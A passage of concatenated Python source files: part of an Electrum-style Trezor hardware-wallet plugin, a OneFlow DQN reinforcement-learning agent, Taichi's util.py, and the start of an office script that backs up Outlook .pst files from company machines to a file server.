address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
payload = base64.b64decode(message)
nonce, message, msg_hmac = payload[:33], payload[33:-8], payload[-8:]
result = client.decrypt_message(address_n, nonce, message, msg_hmac)
return result.message
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
        # disable bridge because it seems to never return when a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
# All client interaction should not be in the main GUI thread
assert self.main_thread != threading.current_thread()
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER and self.device == 'TREZOR':
# Warn user about firmware lameness
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
        the device is uninitialized, go through the initialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m')
client.used()
def get_xpub(self, device_id, derivation, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = signed_tx.encode('hex')
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
            wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
client.get_address(self.get_coin_name(), address_n, True)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, x_pubkey.decode('hex'))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: x.decode('hex') if x else '', txin.get('signatures')),
m=txin.get('num_sig'),
)
txinputtype = self.types.TxInputType(
script_type=self.types.SPENDMULTISIG,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = txin['scriptSig'].decode('hex')
txinputtype.script_sig = script_sig
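            # A default sequence of 0xfffffffe keeps nLockTime enforceable
            # without signalling opt-in RBF (BIP 125 treats only values below
            # 0xfffffffe as a replaceability signal).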
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = bc_address_to_hash_160(address)
index, xpubs, m = info
if addrtype == ADDRTYPE_P2PKH:
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = self.types.PAYTOADDRESS,
address_n = address_n,
)
elif addrtype == ADDRTYPE_P2SH:
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
script_type = self.types.PAYTOMULTISIG)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = bc_address_to_hash_160(address)
if addrtype == ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype')
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = vout['scriptPubKey'].decode('hex')
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
BrainDQNOneFlow.py
|
import numpy as np
import os
import random
from collections import deque
import oneflow as flow
import oneflow.typing as tp
from threading import Thread, Lock
import threading
# Hyper Parameters:
FRAME_PER_ACTION = 1
GAMMA = 0.99 # decay rate of past observations
OBSERVE = 100. # timesteps to observe before training
EXPLORE = 200000. # frames over which to anneal epsilon
FINAL_EPSILON = 0. # 0.001 # final value of epsilon
INITIAL_EPSILON = 0. # 0.005 # starting value of epsilon
MAX_REPLAY_MEMORY = 50000 # number of previous transitions to remember
BATCH_SIZE = 32 # size of minibatch
UPDATE_TIME = 100
ACTIONS_NUM = 2 # two actions
DEVICE_TAG = "gpu"
DEVICE_NUM = 1
def dataPrep(data):
    # at the beginning data.shape = (64, 64, 4) or (64, 64, 1)
if data.shape[2] > 1:
mean = np.array([128, 128, 128, 128])
reshaped_mean = mean.reshape(1, 1, 4)
else:
mean=np.array([128])
reshaped_mean = mean.reshape(1, 1, 1)
data = data - reshaped_mean
# convert hwc -> chw
data = np.swapaxes(data, 0, 2)
data = np.swapaxes(data, 1, 2)
data = np.expand_dims(data, axis = 0)
# before return data.shape = (1, 4, 64, 64) or (1, 1, 64, 64)
return data
# get QNet parameters
def getQNetParams(var_name_prefix: str = "QNet",
is_train: bool = True):
weight_init = flow.variance_scaling_initializer(scale = 1.0, mode = "fan_in", distribution = "truncated_normal", data_format = "NCHW")
bias_init = flow.constant_initializer(value = 0.)
conv_prefix = "_conv1"
conv1_weight = flow.get_variable(
var_name_prefix + conv_prefix + "_weight",
shape = (32, 4, 3, 3),
dtype = flow.float32,
initializer = weight_init,
trainable = is_train
)
conv1_bias = flow.get_variable(
var_name_prefix + conv_prefix + "_bias",
shape = (32,),
dtype = flow.float32,
initializer = bias_init,
trainable = is_train
)
conv_prefix = "_conv2"
conv2_weight = flow.get_variable(
var_name_prefix + conv_prefix + "_weight",
shape = (32, 32, 3, 3),
dtype = flow.float32,
initializer = weight_init,
trainable = is_train
)
conv2_bias = flow.get_variable(
var_name_prefix + conv_prefix + "_bias",
shape = (32,),
dtype = flow.float32,
initializer = bias_init,
trainable = is_train
)
fc_prefix = "_fc1"
fc1_weight = flow.get_variable(
var_name_prefix + fc_prefix + "_weight",
shape = (512, 32 * 16 * 16),
dtype = flow.float32,
initializer = weight_init,
trainable = is_train
)
fc1_bias = flow.get_variable(
var_name_prefix + fc_prefix + "_bias",
shape = (512,),
dtype = flow.float32,
initializer = bias_init,
trainable = is_train
)
fc_prefix = "_fc2"
fc2_weight = flow.get_variable(
var_name_prefix + fc_prefix + "_weight",
shape = (ACTIONS_NUM, 512),
dtype = flow.float32,
initializer = weight_init,
trainable = is_train
)
fc2_bias = flow.get_variable(
var_name_prefix + fc_prefix + "_bias",
shape = (ACTIONS_NUM,),
dtype = flow.float32,
initializer = bias_init,
trainable = is_train
)
return conv1_weight, conv1_bias, conv2_weight, conv2_bias, fc1_weight, fc1_bias, fc2_weight, fc2_bias
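# createOfQNet builds a small CNN: two 3x3 conv + batch-norm + ReLU blocks,
# each followed by 2x2 max pooling (64x64 -> 32x32 -> 16x16), then a 512-unit
# fully connected layer and a final layer with one output per action.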
def createOfQNet(input_image: tp.Numpy.Placeholder((BATCH_SIZE, 4, 64, 64), dtype = flow.float32),
var_name_prefix: str = "QNet",
is_train: bool = True) -> tp.Numpy:
conv1_weight, conv1_bias, conv2_weight, conv2_bias, fc1_weight, fc1_bias, fc2_weight, fc2_bias = \
getQNetParams(var_name_prefix = var_name_prefix, is_train = is_train)
conv1 = flow.nn.compat_conv2d(
input_image,
conv1_weight,
strides = [1, 1],
padding = "same",
data_format = "NCHW"
)
conv1 = flow.nn.bias_add(conv1, conv1_bias, "NCHW")
conv1 = flow.layers.batch_normalization(inputs = conv1, axis = 1, name = "conv1_bn")
conv1 = flow.nn.relu(conv1)
pool1 = flow.nn.max_pool2d(conv1, 2, 2, "VALID", "NCHW", name = "pool1")
conv2 = flow.nn.compat_conv2d(
pool1,
conv2_weight,
strides = [1, 1],
padding = "same",
data_format = "NCHW"
)
conv2 = flow.nn.bias_add(conv2, conv2_bias, "NCHW")
conv2 = flow.layers.batch_normalization(inputs = conv2, axis = 1, name = "conv2_bn")
conv2 = flow.nn.relu(conv2)
pool2 = flow.nn.max_pool2d(conv2, 2, 2, "VALID", "NCHW", name = "pool2")
    # pool2.shape = (BATCH_SIZE, 32, 16, 16); after reshape it becomes (BATCH_SIZE, 32 * 16 * 16)
pool2_flatten = flow.reshape(pool2, (BATCH_SIZE, -1))
fc1 = flow.matmul(a = pool2_flatten, b = fc1_weight, transpose_b = True)
fc1 = flow.nn.bias_add(fc1, fc1_bias)
fc1 = flow.layers.batch_normalization(inputs = fc1, axis = 1, name = "fc1_bn")
fc1 = flow.nn.relu(fc1)
fc2 = flow.matmul(a = fc1, b = fc2_weight, transpose_b = True)
fc2 = flow.nn.bias_add(fc2, fc2_bias)
return fc2
def get_train_config():
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float32)
func_config.default_logical_view(flow.scope.consistent_view())
return func_config
def get_predict_config():
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float32)
func_config.default_logical_view(flow.scope.consistent_view())
return func_config
@flow.global_function("train", get_train_config())
def trainQNet(input_image: tp.Numpy.Placeholder((BATCH_SIZE, 4, 64, 64), dtype = flow.float32),
y_input: tp.Numpy.Placeholder((BATCH_SIZE,), dtype = flow.float32),
action_input: tp.Numpy.Placeholder((BATCH_SIZE, 2), dtype = flow.float32)):
with flow.scope.placement(DEVICE_TAG, "0:0-%d" % (DEVICE_NUM - 1)):
out = createOfQNet(input_image, var_name_prefix = "QNet", is_train = True)
Q_Action = flow.math.reduce_sum(out * action_input, axis = 1)
cost = flow.math.reduce_mean(flow.math.square(y_input - Q_Action))
learning_rate = 0.0002
beta1 = 0.9
flow.optimizer.Adam(flow.optimizer.PiecewiseConstantScheduler([], [learning_rate]), beta1 = beta1).minimize(cost)
@flow.global_function("predict", get_predict_config())
def predictQNet(input_image: tp.Numpy.Placeholder((BATCH_SIZE, 4, 64, 64), dtype = flow.float32)) -> tp.Numpy:
with flow.scope.placement(DEVICE_TAG, "0:0-%d" % (DEVICE_NUM - 1)):
out = createOfQNet(input_image, var_name_prefix = "QNetT", is_train = False)
return out
# copy QNet parameters to QNetT
@flow.global_function("predict", get_predict_config())
def copyQNetToQnetT():
with flow.scope.placement(DEVICE_TAG, "0:0-%d" % (DEVICE_NUM - 1)):
t_conv1_weight, t_conv1_bias, t_conv2_weight, t_conv2_bias, t_fc1_weight, t_fc1_bias, t_fc2_weight, t_fc2_bias = \
getQNetParams(var_name_prefix = "QNet", is_train = True)
p_conv1_weight, p_conv1_bias, p_conv2_weight, p_conv2_bias, p_fc1_weight, p_fc1_bias, p_fc2_weight, p_fc2_bias = \
getQNetParams(var_name_prefix = "QNetT", is_train = False)
flow.assign(p_conv1_weight, t_conv1_weight)
flow.assign(p_conv1_bias, t_conv1_bias)
flow.assign(p_conv2_weight, t_conv2_weight)
flow.assign(p_conv2_bias, t_conv2_bias)
flow.assign(p_fc1_weight, t_fc1_weight)
flow.assign(p_fc1_bias, t_fc1_bias)
flow.assign(p_fc2_weight, t_fc2_weight)
flow.assign(p_fc2_bias, t_fc2_bias)
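# "QNet" is the online network that gets trained; "QNetT" is the target
# network used for Q-value prediction and is refreshed from QNet every
# UPDATE_TIME steps via copyQNetToQnetT().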
class OfBrainDQN:
def __init__(self, args):
# init replay memory
self.replayMemory = deque()
# init some parameters
self.timeStep = 0
self.epsilon = INITIAL_EPSILON
self.trainQNet = trainQNet
self.predictQNet = predictQNet
self.copyQNetToQnetT = copyQNetToQnetT
self.check_point_dir = args.checkpoints_path
self.pretrain_models = args.pretrain_models
self.check_point = flow.train.CheckPoint()
if self.pretrain_models != '':
self.check_point.load(self.pretrain_models)
else:
self.check_point.init()
self.time_step_mutex = Lock()
self.predict_QNet_mutex = Lock()
self.replay_memory_mutex = Lock()
self.train_thread = Thread(target = self.trainQNetwork)
self.thread_started = False
def trainQNetwork(self):
while True:
self.replay_memory_mutex.acquire()
# Step 1: obtain random minibatch from replay memory
minibatch = random.sample(self.replayMemory, BATCH_SIZE)
self.replay_memory_mutex.release()
            # state_batch.shape = (BATCH_SIZE, 4, 64, 64)
state_batch = np.squeeze([data[0] for data in minibatch])
action_batch = np.squeeze([data[1] for data in minibatch])
reward_batch = np.squeeze([data[2] for data in minibatch])
next_state_batch = np.squeeze([data[3] for data in minibatch])
# Step 2: calculate y_batch
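            # Bellman target: y = r for terminal transitions,
            # y = r + GAMMA * max_a' Q_target(s', a') otherwise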
self.predict_QNet_mutex.acquire()
Qvalue_batch = self.predictQNet(next_state_batch)
self.predict_QNet_mutex.release()
terminal = np.squeeze([data[4] for data in minibatch])
y_batch = reward_batch.astype(np.float32)
            terminal_false = terminal == False
            # only add the discounted future reward for non-terminal transitions
            if np.any(terminal_false):
y_batch[terminal_false] += (GAMMA * np.max(Qvalue_batch, axis=1))[terminal_false]
# do forward, backward and update parameters
self.trainQNet(state_batch, y_batch, action_batch)
self.time_step_mutex.acquire()
localTimeStep = self.timeStep
self.time_step_mutex.release()
# save network every 100 iterations
if localTimeStep % 100 == 0:
if not os.path.exists(self.check_point_dir):
os.mkdir(self.check_point_dir)
save_path = '%s/network-dqn_of_%d' % (self.check_point_dir, localTimeStep)
if not os.path.exists(save_path):
self.check_point.save(save_path)
if localTimeStep % UPDATE_TIME == 0:
self.predict_QNet_mutex.acquire()
self.copyQNetToQnetT()
self.predict_QNet_mutex.release()
def setInitState(self, observation):
        # temp.shape = (1, 4, 64, 64)
temp = dataPrep(np.stack((observation, observation, observation, observation), axis = 2))
self.currentState = temp
def setPerception(self, nextObservation, action, reward, terminal):
        # drop the oldest stacked frame of currentState and append nextObservation
        # newState.shape = (1, 4, 64, 64)
newState = np.append(self.currentState[:, 1:, :, :], dataPrep(nextObservation), axis = 1)
self.replay_memory_mutex.acquire()
self.replayMemory.append(
(self.currentState.astype(np.float32), action.astype(np.float32), reward, newState.astype(np.float32), terminal))
self.replay_memory_mutex.release()
if len(self.replayMemory) > MAX_REPLAY_MEMORY:
self.replayMemory.popleft()
if self.timeStep > OBSERVE and not self.thread_started:
# Train the network
self.train_thread.start()
self.thread_started = True
# print info
state = ""
if self.timeStep <= OBSERVE:
state = "observe"
elif self.timeStep > OBSERVE and self.timeStep <= OBSERVE + EXPLORE:
state = "explore"
else:
state = "train"
if self.timeStep % UPDATE_TIME == 0:
print("TIMESTEP", self.timeStep, "/ STATE", state, "/ EPSILON", self.epsilon)
self.currentState = newState
self.time_step_mutex.acquire()
self.timeStep += 1
self.time_step_mutex.release()
def getAction(self):
input_images = np.repeat(self.currentState, BATCH_SIZE, axis = 0).astype(np.float32)
self.predict_QNet_mutex.acquire()
Qvalue = np.squeeze(self.predictQNet(input_images))
self.predict_QNet_mutex.release()
Qvalue = Qvalue[0]
action = np.zeros(ACTIONS_NUM)
action_index = 0
if self.timeStep % FRAME_PER_ACTION == 0:
if random.random() <= self.epsilon:
action_index = random.randrange(ACTIONS_NUM)
action[action_index] = 1
else:
action_index = np.argmax(Qvalue)
action[action_index] = 1
else:
action[0] = 1 # do nothing
        # change epsilon
if self.epsilon > FINAL_EPSILON and self.timeStep > OBSERVE:
self.epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE
return action
|
util.py
|
import ctypes
import os
import platform
import shutil
import sys
from colorama import Back, Fore, Style
if sys.version_info < (3, 6):
raise RuntimeError(
"\nPlease restart with Python 3.6+\n" + "Current Python version:",
sys.version_info)
ti_core = None
def in_docker():
if os.environ.get("TI_IN_DOCKER", "") == "":
return False
else:
return True
def get_os_name():
name = platform.platform()
# in python 3.8, platform.platform() uses mac_ver() on macOS
# it will return 'macOS-XXXX' instead of 'Darwin-XXXX'
if name.lower().startswith('darwin') or name.lower().startswith('macos'):
return 'osx'
elif name.lower().startswith('windows'):
return 'win'
elif name.lower().startswith('linux'):
return 'linux'
assert False, "Unknown platform name %s" % name
def import_ti_core():
global ti_core
if get_os_name() != 'win':
old_flags = sys.getdlopenflags()
sys.setdlopenflags(2 | 8) # RTLD_NOW | RTLD_DEEPBIND
else:
pyddir = os.path.join(package_root(), 'lib')
os.environ['PATH'] += ';' + pyddir
try:
import taichi_core as core
except Exception as e:
if isinstance(e, ImportError):
print(Fore.YELLOW + "Share object taichi_core import failed, "
"check this page for possible solutions:\n"
"https://docs.taichi.graphics/lang/articles/misc/install" +
Fore.RESET)
if get_os_name() == 'win':
e.msg += '\nConsider installing Microsoft Visual C++ Redistributable: https://aka.ms/vs/16/release/vc_redist.x64.exe'
elif get_os_name() == 'linux':
e.msg += '\nConsider installing libtinfo5: sudo apt-get install libtinfo5'
raise e from None
ti_core = core
if get_os_name() != 'win':
sys.setdlopenflags(old_flags)
lib_dir = os.path.join(package_root(), 'lib')
core.set_lib_dir(locale_encode(lib_dir))
def locale_encode(path):
try:
import locale
return path.encode(locale.getdefaultlocale()[1])
except:
try:
import sys
return path.encode(sys.getfilesystemencoding())
except:
try:
return path.encode()
except:
return path
def is_ci():
return os.environ.get('TI_CI', '') == '1'
def package_root():
return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../')
def get_core_shared_object():
directory = os.path.join(package_root(), 'lib')
return os.path.join(directory, 'libtaichi_core.so')
def print_red_bold(*args, **kwargs):
print(Fore.RED + Style.BRIGHT, end='')
print(*args, **kwargs)
print(Style.RESET_ALL, end='')
def check_exists(src):
if not os.path.exists(src):
raise FileNotFoundError(
f'File "{src}" not exist. Installation corrupted or build incomplete?'
)
def get_unique_task_id():
import datetime
import random
return datetime.datetime.now().strftime('task-%Y-%m-%d-%H-%M-%S-r') + (
'%05d' % random.randint(0, 10000))
sys.path.append(os.path.join(package_root(), 'lib'))
import_ti_core()
ti_core.set_python_package_dir(package_root())
os.makedirs(ti_core.get_repo_dir(), exist_ok=True)
log_level = os.environ.get('TI_LOG_LEVEL', '')
if log_level:
ti_core.set_logging_level(log_level)
def get_dll_name(name):
if get_os_name() == 'linux':
return 'libtaichi_%s.so' % name
elif get_os_name() == 'osx':
return 'libtaichi_%s.dylib' % name
elif get_os_name() == 'win':
return 'taichi_%s.dll' % name
else:
raise Exception(f"Unknown OS: {get_os_name()}")
def at_startup():
ti_core.set_core_state_python_imported(True)
def start_memory_monitoring(output_fn, pid=-1, interval=1):
# removing dependency on psutil
return
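    # NOTE: the code below the early return is never executed; it is kept only
    # for reference.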
import os
import time
import psutil
if pid == -1:
pid = os.getpid()
import multiprocessing
def task():
with open(output_fn, 'w') as f:
process = psutil.Process(pid)
while True:
try:
mem = process.memory_info().rss
except:
mem = -1
time.sleep(interval)
print(time.time(), mem, file=f)
f.flush()
proc = multiprocessing.Process(target=task, daemon=True)
proc.start()
def require_version(major, minor=None, patch=None):
    # treat an unspecified minor/patch as 0 so the integer comparisons below
    # do not fail with a TypeError
    minor = minor or 0
    patch = patch or 0
    versions = [
        int(ti_core.get_version_major()),
        int(ti_core.get_version_minor()),
        int(ti_core.get_version_patch()),
    ]
match = major == versions[0] and (
minor < versions[1] or minor == versions[1] and patch <= versions[2])
if match:
return
else:
print("Taichi version mismatch. required >= {}.{}.{}".format(
major, minor, patch))
print("Installed =", ti_core.get_version_string())
raise Exception("Taichi version mismatch")
at_startup()
def _print_taichi_header():
header = '[Taichi] '
header += f'version {ti_core.get_version_string()}, '
llvm_version = ti_core.get_llvm_version_string()
header += f'llvm {llvm_version}, '
commit_hash = ti_core.get_commit_hash()
commit_hash = commit_hash[:8]
header += f'commit {commit_hash}, '
header += f'{get_os_name()}, '
py_ver = '.'.join(str(x) for x in sys.version_info[:3])
header += f'python {py_ver}'
print(header)
_print_taichi_header()
__all__ = [
'ti_core',
'get_os_name',
'start_memory_monitoring',
'package_root',
'require_version',
]
|
CompanyOutlookBackup.py
|
# from/import for portability
from psutil import process_iter
from shutil import copyfile
from os import path, makedirs, system, remove
from socket import socket, AF_INET, SOCK_STREAM, gaierror, getfqdn
from glob import glob
from pathlib import Path
from multiprocessing import Process
from datetime import datetime,date
from time import sleep
from contextlib import suppress
# pyinstaller -F -I=TMF.ico CompanyOutlookBackup.py
# Each of the users in a dict of their logon(key)
# and the name of their backup drive folder(value)
# Use individual backup folders because most people
# have named their .pst files Outlook.pst
userKeyDict = {
'jwayne': 'John',
'drenalds': 'Dennis',
'deerenalds': 'Dee',
'frenalds': 'Frank',
'ckelly': 'Charlie',
'rmcdonald': 'Mac',
'zvanmeter': 'Zach'
}
floorKeyList = [ # These users are on shared computers, or Userless computers
'weld',
'intg',
'mill',
'inspect',
'cnc',
'shipping',
'lathe',
'receiving',
'tool',
'troya',
'maint',
'saw',
'toolcrib',
'cps',
'tblanton',
]
deviceDict = {
'ex304':'',
'ex311':'',
'ex319':'',
'ex325':'',
'ex326':'',
'ex327':'',
'ex329':'',
'ex368':'',
'ex374':'',
'ext300':'',
'ext306':'',
'ext307':'',
'ext308-1':'',
'ext309':'',
'ext312':'',
'ext314':'',
'ext316':'',
'ext317':'',
'ext318':'',
'ext320':'',
'ext321':'',
'ext325':'',
'ext326':'',
'ext326-1':'',
'ext330-2':'',
'ext331':'',
'ext332':'',
'ext336':'',
'ext355':'',
'ext355-1':'',
'ext367':'',
'ext370':'',
'ext373':'',
'cmmcnc':'',
'cmmlarge':'',
'cnc18':'',
'cps':'',
'epicor356':'',
'intg14':'',
'lathe17':'',
'maint15':'',
'mill18':'',
'receiving14':'',
'saw18':'',
'shipping14':'',
'toolcrib':'',
'weld14':'',
    'ext425':'dummy value', # Can't ping Plant II for some reason
}
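# CopyPst decides where a discovered mail file should be backed up: logons in
# userKeyDict go to that user's folder on \\tmfsvr7\Users, shared floor logons
# go to "Floor Backups", and anything else lands in "All Leftover Email
# Backups". The actual copy runs in a separate process after Outlook has been
# force-closed on the source machine.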
def CopyPst(pathDir,DoCopy,FilePathList):
def reverseDict(pathDir):
deviceName, loginUser = ParsePath(pathDir)
#print(pathDir) # all .pst files
if loginUser in userKeyDict:
#print(pathDir) # all user .pst files
dst = GenDst('',deviceName,userKeyDict[loginUser],'\\\\tmfsvr7\\Users\\%s'%(userKeyDict[loginUser]),pathDir)
return userKeyDict[loginUser], dst, deviceName
else:
#print(pathDir) # all leftover .pst files
dstDir = '\\\\tmfsvr7\\Users\\Floor Backups' if loginUser in floorKeyList else '\\\\tmfsvr7\\Users\\All Leftover Email Backups'
_,_,filename = pathDir.rpartition('\\')
dst = GenDst('%s %s'%(loginUser,filename),deviceName,loginUser,dstDir,pathDir)
return loginUser, dst, deviceName
def ParsePath(pathDir):
RplStr = '\\Users\\' if '\\Users\\' in pathDir else '\\Documents and Settings\\'
deviceName,_,tail = pathDir.partition(RplStr)
loginUser, _,tail = tail.partition('\\')
return deviceName.replace('\\c$',''), loginUser.lower()
def GenDst(filename,deviceName,dstUser,dstDir,pathDir): # Format Destination .pst file
if filename == '':
newfilepath = "\\\\tmfsvr7\\Users\\%s\\Email Backups\\"%(dstUser)
_,_, filename = pathDir.replace('.pst','').rpartition('\\')
return ('%s Backup %s %s.pst')%(newfilepath+filename,str(date.today().year),str(date.today().month))
else: return dstDir+'\\%s %s\\'%(deviceName, dstUser)+filename
# ############################################################ #
dstUser, dst, deviceName = reverseDict(pathDir)
if DoCopy == 'Floor' and not 'floor' in dst.lower(): return
if DoCopy == 'Test': print('Copy: '+pathDir+'\nTo: '+dst)
if not path.isfile(dst):
Process(target=CloseOutlook, args=(deviceName,)).start()
Process(target=DoCopyBit, args=(dst,pathDir,dstUser,FilePathList)).start()
print('Copying', dst)
else: print('Already Done:', dst)
def CloseOutlook(deviceName): system("taskkill /s "+deviceName+" /u zvanmeter /FI \"IMAGENAME eq OUTLOOK.EXE\"")
def DoCopyBit(dst,pathDir,dstUser,FilePathList):
